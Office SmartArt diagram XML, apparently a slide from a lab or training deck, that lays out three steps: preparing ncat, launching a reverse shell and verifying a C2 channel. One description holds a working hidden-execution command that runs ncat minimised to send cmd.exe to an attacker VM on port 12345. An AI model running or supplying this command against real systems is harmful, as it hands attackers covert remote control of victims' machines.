    <dgm:cxn modelId="{6026D86D-4DE1-4AF6-9816-937784A96F88}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{223BA8AD-48E4-43D8-84D2-4845BBBBE01C}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{C5336850-DBAC-4B94-BEB0-4F2942919D1D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{79B00C64-6DB3-4104-BD6B-C27CD409FE75}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{0CE17BFB-33F3-4349-8F1E-CDD64B759A79}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{03A53DE9-B6CC-4D66-BF42-C213072EC9E4}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{3AB7C1B2-083C-4211-8E6E-BAE42BD95EC8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{2CAB9858-FFD1-4ACF-A72B-1124206ACAFD}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{7296A0EA-12AA-42AF-9B14-96775FB23DE4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{6CEAE1E2-B0BB-4E42-A29D-9B00BE46AFDE}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{0530AC03-97A1-40A4-BB60-95F79788777B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{C28C1BEB-D5AE-4F66-BA27-A5B8EAEADB18}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{7038B92C-2FC2-4789-B800-C6D176458155}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{FA2AC44E-D349-44B2-BC7F-0B03F7614514}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{474FC12B-3D69-4575-9C25-5570F59D8BA9}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{EF99FE8E-21C7-42BF-8276-BB0521F72E57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{8D0D79A8-C621-445A-96A4-DDB94D7E6131}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{365DBD4B-AC04-41E1-83C7-40EAB537CA7A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{168EA773-EDA6-4971-8697-DF9581BE9F4F}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{196D1023-5CC9-4624-9CAA-AB1488EB5C0A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{4B6FA380-B807-4AF7-9E61-A9481D07ACF3}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{550A3456-1152-46D9-898D-CCA51FCABCED}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{6DBD575E-B204-406F-B7CC-6FDF4FAE8515}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{595B376C-3674-400F-BF40-D896771E9AFD}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{FDD3DE48-E3C9-4468-93B9-0E7D0D444006}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{67C4A393-FA1C-4C5B-BD7B-FC828B112D01}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F7477F19-D24E-416E-AFE4-2E4285AFCA9A}" type="presParOf" srcId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" destId="{5F7A57D2-DE20-4FCB-B9B3-97B3911F0941}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{E2AFFCDC-2055-46F4-A382-85D7F121C140}" type="presParOf" srcId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" destId="{57D6804C-477A-4F4B-94C9-AAEB8667A7C8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1C7DAB76-7BD3-4AEE-A7E7-E82D9E9D2C6C}" type="presParOf" srcId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" destId="{9A7B1654-6854-4B4C-BA96-AA806E9A3C51}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{BFCF1738-0174-4E99-8C69-DF00BDA6FC62}" type="presParOf" srcId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" destId="{95B73724-9110-4117-AC09-BB521FF10F36}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{CD7C470F-8DB2-49BA-A816-1BB49E2BDC73}" type="presParOf" srcId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" destId="{EC6924BF-E1BF-4CBF-8F5B-4858C0C2786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5EAA6D-D537-4A94-94C1-44D43AD2D0DA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272D32-00BE-43A4-BE7C-ED6BD879B19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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Prepare the Tool </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E93B261-E2EB-4BE3-AB4E-8181A7D6445B}" type="parTrans" cxnId="{46AD178D-C04C-4826-A73E-1E8BB58B6084}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D12A1EB9-520A-4141-A19D-2A00479F719E}" type="sibTrans" cxnId="{46AD178D-C04C-4826-A73E-1E8BB58B6084}">
      <dgm:prSet phldrT="1" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60D810EB-7CD1-46EC-8CE2-5E2C4C189AD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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Launch Reverse Shell  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C73967E-1821-43CF-AA38-6A93B8D1187E}" type="parTrans" cxnId="{F9FBFCB3-7632-4A73-ADAC-417B33381D9E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5A8DAEE-6AA2-4825-B108-A62050E7AEE6}" type="sibTrans" cxnId="{F9FBFCB3-7632-4A73-ADAC-417B33381D9E}">
      <dgm:prSet phldrT="2" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Verify C2 Channel</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2386F4D-2C40-4B1C-89CA-9D8143BE8CA8}" type="parTrans" cxnId="{888D31B1-6E60-4432-B257-C6B8FE853253}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CF78AFA-B82E-49F8-8CFE-1E5E98A60369}" type="sibTrans" cxnId="{888D31B1-6E60-4432-B257-C6B8FE853253}">
      <dgm:prSet phldrT="3" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA29598A-E6AF-4C9C-810F-8AA4C7C3EA9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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Attacker VM should receive an interactive shell on port 12345.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0FAA858-38FE-413A-A961-9C9FCC83E52A}" type="parTrans" cxnId="{E8D4BA83-533A-4F21-9C7A-ED0F68F2AB65}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7132AE1E-5292-4F7C-B216-A51BA70C3207}" type="sibTrans" cxnId="{E8D4BA83-533A-4F21-9C7A-ED0F68F2AB65}">
      <dgm:prSet phldrT="4" phldr="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{22B70F24-0D05-4ECF-8404-32AC0891BC5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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Ensure ncat.exe is present (download via winget or curl).</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDC587E7-062B-415A-8CA5-7EEF82DB0956}" type="parTrans" cxnId="{99452B62-5DEE-458C-9F17-E7199CF2260A}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08F9B067-57C9-4056-9BDB-D17925B5027C}" type="sibTrans" cxnId="{99452B62-5DEE-458C-9F17-E7199CF2260A}">
      <dgm:prSet phldrT="2" phldr="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FABF7488-7F34-445B-9AF4-70757156AAD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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Hidden execution:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" b="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> start /min cmd /c "ncat 172.20.10.15 12345 -e cmd.exe"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B935B5EB-CA20-4B5A-A3AA-4FC07C36926B}" type="parTrans" cxnId="{7B8F5B5D-C050-4DC3-9A6F-F2ED192007F8}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1177F4C-B6DD-477A-B428-8913DB439A0D}" type="sibTrans" cxnId="{7B8F5B5D-C050-4DC3-9A6F-F2ED192007F8}">
      <dgm:prSet phldrT="3" phldr="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" type="pres">
      <dgm:prSet presAssocID="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" type="pres">
      <dgm:prSet presAssocID="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A09AB71-FF1F-4106-A550-6C5FB424EEB5}" type="pres">
      <dgm:prSet presAssocID="{0D272D32-00BE-43A4-BE7C-ED6BD879B1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1D6BFCF-49BF-4146-A1F0-4598789116CD}" type="pres">
      <dgm:prSet presAssocID="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{537F89C8-5C7E-4E84-A74B-9A80CE8DAFD8}" type="pres">
      <dgm:prSet presAssocID="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7315F56-2354-4342-9EE6-7356D1FB2622}" type="pres">
      <dgm:prSet presAssocID="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A96AE001-0FAD-4242-9723-C8DDAC7FD9B6}" type="pres">
      <dgm:prSet presAssocID="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42181778-5C3D-4D64-BA5E-09BC6A7B150F}" type="pres">
      <dgm:prSet presAssocID="{D12A1EB9-520A-4141-A19D-2A00479F719E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" type="pres">
      <dgm:prSet presAssocID="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{774462F3-C667-490E-8DB4-2DAF4D942B0B}" type="pres">
      <dgm:prSet presAssocID="{60D810EB-7CD1-46EC-8CE2-5E2C4C189A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6C273EB4-F81B-4A70-9D96-3A7721DC2568}" type="pres">
      <dgm:prSet presAssocID="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{461EA02A-7C79-42F1-B8AB-F8EB91CFF3EB}" type="pres">
      <dgm:prSet presAssocID="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{475C7487-25A6-458F-97E7-693EDBA757FC}" type="pres">
      <dgm:prSet presAssocID="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B7EAFBE-4AA1-49F4-9FC6-01AD93752EA0}" type="pres">
      <dgm:prSet presAssocID="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48F949E6-BDD2-490A-8DE1-59AB6AAE882C}" type="pres">
      <dgm:prSet presAssocID="{F5A8DAEE-6AA2-4825-B108-A62050E7AEE6}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE117E10-515C-4578-9CE4-8A23652CB654}" type="pres">
      <dgm:prSet presAssocID="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB928308-77B1-4279-8CC9-4D4857E3BF72}" type="pres">
      <dgm:prSet presAssocID="{B5823F3F-83BD-4C03-A75D-2CE33D7B35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0A0D542-4913-413F-80AC-EFF08AB459D6}" type="pres">
      <dgm:prSet presAssocID="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7BA9F12D-2699-4044-9A81-91AB9C2E889A}" type="pres">
      <dgm:prSet presAssocID="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48383A54-E860-4DF4-90CA-9BC1BEF56B5D}" type="pres">
      <dgm:prSet presAssocID="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44FEA4E3-C168-4BBB-9E6A-D46BFF2B3254}" type="pres">
      <dgm:prSet presAssocID="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" presName="desTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7B8F5B5D-C050-4DC3-9A6F-F2ED192007F8}" srcId="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" destId="{FABF7488-7F34-445B-9AF4-70757156AAD2}" srcOrd="0" destOrd="0" parTransId="{B935B5EB-CA20-4B5A-A3AA-4FC07C36926B}" sibTransId="{A1177F4C-B6DD-477A-B428-8913DB439A0D}"/>
    <dgm:cxn modelId="{99452B62-5DEE-458C-9F17-E7199CF2260A}" srcId="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" destId="{22B70F24-0D05-4ECF-8404-32AC0891BC50}" srcOrd="0" destOrd="0" parTransId="{CDC587E7-062B-415A-8CA5-7EEF82DB0956}" sibTransId="{08F9B067-57C9-4056-9BDB-D17925B5027C}"/>
    <dgm:cxn modelId="{FC7E206A-AA83-4C05-89F5-9B89A06BFA8D}" type="presOf" srcId="{22B70F24-0D05-4ECF-8404-32AC0891BC50}" destId="{A96AE001-0FAD-4242-9723-C8DDAC7FD9B6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{0210E570-2A13-4EEB-9E87-BA0D5D53CBA2}" type="presOf" srcId="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" destId="{461EA02A-7C79-42F1-B8AB-F8EB91CFF3EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{E8D4BA83-533A-4F21-9C7A-ED0F68F2AB65}" srcId="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" destId="{DA29598A-E6AF-4C9C-810F-8AA4C7C3EA9F}" srcOrd="0" destOrd="0" parTransId="{B0FAA858-38FE-413A-A961-9C9FCC83E52A}" sibTransId="{7132AE1E-5292-4F7C-B216-A51BA70C3207}"/>
    <dgm:cxn modelId="{46AD178D-C04C-4826-A73E-1E8BB58B6084}" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" srcOrd="0" destOrd="0" parTransId="{0E93B261-E2EB-4BE3-AB4E-8181A7D6445B}" sibTransId="{D12A1EB9-520A-4141-A19D-2A00479F719E}"/>
    <dgm:cxn modelId="{87501095-4ABE-4F95-B6AE-11F5E0A305B8}" type="presOf" srcId="{DA29598A-E6AF-4C9C-810F-8AA4C7C3EA9F}" destId="{44FEA4E3-C168-4BBB-9E6A-D46BFF2B3254}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F5A427A9-EF2B-43AF-A073-F4E38DEFD164}" type="presOf" srcId="{FABF7488-7F34-445B-9AF4-70757156AAD2}" destId="{3B7EAFBE-4AA1-49F4-9FC6-01AD93752EA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{888D31B1-6E60-4432-B257-C6B8FE853253}" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" srcOrd="2" destOrd="0" parTransId="{E2386F4D-2C40-4B1C-89CA-9D8143BE8CA8}" sibTransId="{6CF78AFA-B82E-49F8-8CFE-1E5E98A60369}"/>
    <dgm:cxn modelId="{F9FBFCB3-7632-4A73-ADAC-417B33381D9E}" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{60D810EB-7CD1-46EC-8CE2-5E2C4C189ADB}" srcOrd="1" destOrd="0" parTransId="{2C73967E-1821-43CF-AA38-6A93B8D1187E}" sibTransId="{F5A8DAEE-6AA2-4825-B108-A62050E7AEE6}"/>
    <dgm:cxn modelId="{D65D0DBE-7236-46DB-9F99-E702C7EF9FC4}" type="presOf" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{D81818D3-C4E8-4B01-8D58-5D10C489DB10}" type="presOf" srcId="{0D272D32-00BE-43A4-BE7C-ED6BD879B196}" destId="{537F89C8-5C7E-4E84-A74B-9A80CE8DAFD8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{11A114E2-A5D6-4B09-8C0F-29DF3A82FDC6}" type="presOf" srcId="{B5823F3F-83BD-4C03-A75D-2CE33D7B35E1}" destId="{7BA9F12D-2699-4044-9A81-91AB9C2E889A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{C54A2E3C-0E22-4378-AAA5-ABC4865791DC}" type="presParOf" srcId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" destId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1D2433FD-D946-4DFB-B737-0200AEE1AEC1}" type="presParOf" srcId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" destId="{0A09AB71-FF1F-4106-A550-6C5FB424EEB5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{E13AD722-0925-4351-857C-87139ABCC504}" type="presParOf" srcId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" destId="{F1D6BFCF-49BF-4146-A1F0-4598789116CD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{421DA783-3AF0-454E-9308-6BAF143269AD}" type="presParOf" srcId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" destId="{537F89C8-5C7E-4E84-A74B-9A80CE8DAFD8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{E8BAC5EB-C514-4C8D-89D5-C1DEC8506466}" type="presParOf" srcId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" destId="{E7315F56-2354-4342-9EE6-7356D1FB2622}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{053097F3-B291-4A6A-8FD0-956AD657DDD1}" type="presParOf" srcId="{B3B88356-7223-4CA5-B7DD-ED5D09223C09}" destId="{A96AE001-0FAD-4242-9723-C8DDAC7FD9B6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{56F38800-6F49-416D-8920-718D554BFB0C}" type="presParOf" srcId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" destId="{42181778-5C3D-4D64-BA5E-09BC6A7B150F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
